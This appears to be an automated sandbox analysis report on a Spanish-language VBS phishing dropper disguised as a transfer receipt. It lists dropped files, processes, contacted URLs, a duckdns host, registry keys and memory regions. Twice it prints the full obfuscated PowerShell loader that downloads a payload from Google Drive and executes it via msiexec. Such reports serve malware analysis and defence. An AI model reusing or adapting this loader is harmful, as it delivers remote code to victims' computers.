Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Recibo de transferencia#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\Margenindstilling.Sys
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmaknurk.bre.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2mcr4sj.3wo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdicctlj.ruj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3rcp3fy.ttz.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat
Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for(
$Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){
&($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan
pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at
ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk
PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve
ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised
'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o
anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka
t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1
dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat
';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens
(Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn
,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe
rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO
LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl
TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens
(Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep
o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme=
Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T
Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised
'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo
alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt.
FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens
(Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N
sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru
EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer
kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl
olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke
Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM
culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr
peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens
(Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa
Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised
'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg
StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A
omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians)
rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha
aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra
teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu
,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens
(Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug=
Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits
Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo
ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders
TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6
Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens
(Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds
Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd
Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka
Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised
'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio
OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri
Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan
or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi
');Revanchistens $Carbonatisation;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat
Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for(
$Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){
&($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan
pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at
ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk
PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve
ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised
'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o
anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka
t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1
dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat
';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens
(Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn
,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe
rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO
LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl
TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens
(Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep
o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme=
Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T
Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised
'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo
alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt.
FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens
(Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N
sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru
EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer
kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl
olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke
Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM
culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr
peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens
(Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa
Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised
'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg
StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A
omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians)
rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha
aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra
teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu
,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens
(Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug=
Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits
Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo
ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders
TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6
Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens
(Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds
Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd
Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka
Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised
'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio
OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri
Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan
or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi
');Revanchistens $Carbonatisation;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://drive.usercontent.google.com/j
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://drive.go
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://drive.usercontent.google.com/fk
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://aka.ms/pscore6lBfq
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 18 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.184.206
|
||
|
drive.usercontent.google.com
|
142.250.185.97
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.184.206
|
drive.google.com
|
United States
|
||
|
142.250.185.97
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
605D000
|
trusted library allocation
|
page read and write
|
|
|
|
1F8A8C05000
|
trusted library allocation
|
page read and write
|
|
|
|
6660000
|
heap
|
page read and write
|
|
|
|
57AA000
|
remote allocation
|
page execute and read and write
|
|
|
|
8EE0000
|
direct allocation
|
page execute and read and write
|
|
|
|
B79A000
|
direct allocation
|
page execute and read and write
|
|
|
|
20FE90EB000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
2270000
|
heap
|
page read and write
|
||
|
68A0000
|
direct allocation
|
page read and write
|
||
|
6660000
|
heap
|
page read and write
|
||
|
65D0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
20FE7307000
|
heap
|
page read and write
|
||
|
7B6A000
|
heap
|
page read and write
|
||
|
355D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21DFE000
|
stack
|
page read and write
|
||
|
656E000
|
stack
|
page read and write
|
||
|
B2151FC000
|
stack
|
page read and write
|
||
|
8950000
|
trusted library allocation
|
page read and write
|
||
|
8DCE000
|
stack
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1F89A94D000
|
trusted library allocation
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
20FE91DE000
|
heap
|
page read and write
|
||
|
20FE72E9000
|
heap
|
page read and write
|
||
|
4E90000
|
heap
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
1F89900A000
|
trusted library allocation
|
page read and write
|
||
|
20FE7300000
|
heap
|
page read and write
|
||
|
34AE000
|
stack
|
page read and write
|
||
|
6659000
|
heap
|
page read and write
|
||
|
43AA000
|
remote allocation
|
page execute and read and write
|
||
|
8D6C000
|
stack
|
page read and write
|
||
|
2C4FA38000
|
stack
|
page read and write
|
||
|
20FE9100000
|
heap
|
page read and write
|
||
|
20FE730E000
|
heap
|
page read and write
|
||
|
4E25000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E22000
|
trusted library allocation
|
page read and write
|
||
|
1F898B80000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
6001000
|
trusted library allocation
|
page read and write
|
||
|
1F89925D000
|
trusted library allocation
|
page read and write
|
||
|
20FE9106000
|
heap
|
page read and write
|
||
|
20FE71A0000
|
heap
|
page read and write
|
||
|
21B0C000
|
stack
|
page read and write
|
||
|
1F8B129A000
|
heap
|
page read and write
|
||
|
21970000
|
heap
|
page read and write
|
||
|
1F898B91000
|
trusted library allocation
|
page read and write
|
||
|
65AE000
|
stack
|
page read and write
|
||
|
20FE730B000
|
heap
|
page read and write
|
||
|
2C5078D000
|
stack
|
page read and write
|
||
|
1F8B0EDC000
|
heap
|
page read and write
|
||
|
20FE9106000
|
heap
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
20FE9202000
|
heap
|
page read and write
|
||
|
20FE91D0000
|
heap
|
page read and write
|
||
|
1F89A93A000
|
trusted library allocation
|
page read and write
|
||
|
6880000
|
direct allocation
|
page read and write
|
||
|
20FE730E000
|
heap
|
page read and write
|
||
|
20FE90D3000
|
heap
|
page read and write
|
||
|
20FE9222000
|
heap
|
page read and write
|
||
|
1F89A910000
|
trusted library allocation
|
page read and write
|
||
|
75B0000
|
direct allocation
|
page read and write
|
||
|
1F89A9BC000
|
trusted library allocation
|
page read and write
|
||
|
20FE91D1000
|
heap
|
page read and write
|
||
|
2C4F67D000
|
stack
|
page read and write
|
||
|
1F89A932000
|
trusted library allocation
|
page read and write
|
||
|
20FE9106000
|
heap
|
page read and write
|
||
|
20FE723E000
|
heap
|
page read and write
|
||
|
65EA000
|
heap
|
page read and write
|
||
|
2395000
|
heap
|
page read and write
|
||
|
66A3000
|
heap
|
page read and write
|
||
|
4EDE000
|
stack
|
page read and write
|
||
|
8940000
|
trusted library allocation
|
page read and write
|
||
|
21C5F000
|
stack
|
page read and write
|
||
|
20FE75C0000
|
heap
|
page read and write
|
||
|
1F896DE5000
|
heap
|
page read and write
|
||
|
39AA000
|
remote allocation
|
page execute and read and write
|
||
|
68C0000
|
direct allocation
|
page read and write
|
||
|
7600000
|
